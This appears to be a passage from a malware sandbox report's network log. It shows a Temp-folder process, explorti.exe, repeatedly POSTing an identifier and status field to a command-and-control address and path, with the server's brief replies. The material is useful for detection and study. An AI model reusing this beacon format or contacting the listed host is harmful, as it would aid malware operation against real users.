Jul 26, 2024 13:54:48.940306902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	49793	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:48.950876951 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:49.731879950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	49794	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:49.848725080 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:51.390211105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:51.391146898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:51.392044067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	49795	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:51.403112888 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:52.147854090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	49796	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:52.268826008 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	49797	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:52.286283016 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:53.150304079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	49798	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:53.271287918 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:54.041941881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.8	49799	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:54.059283018 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:54.812735081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.8	49800	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:54.925086021 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:55.707803965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.8	49801	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:55.716937065 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:56.466430902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.8	49802	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:56.581948996 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:57.329648972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.8	49803	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:57.339189053 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:58.107182026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.8	49804	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:58.600387096 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:59.350451946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.8	49805	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:59.358735085 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:00.168735027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.8	49806	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:00.285290956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:01.066714048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.8	49807	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:01.076524019 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:01.836209059 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.8	49808	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:02.028321028 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:02.762142897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.8	49809	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:02.777659893 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:04.536700010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.8	49810	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:04.663261890 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:05.469178915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.8	49811	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:05.479862928 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:06.306339979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.8	49812	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:06.428195000 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:07.183553934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.8	49813	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:07.192743063 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:07.959604979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.8	49814	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:08.081414938 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:08.846509933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.8	49815	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
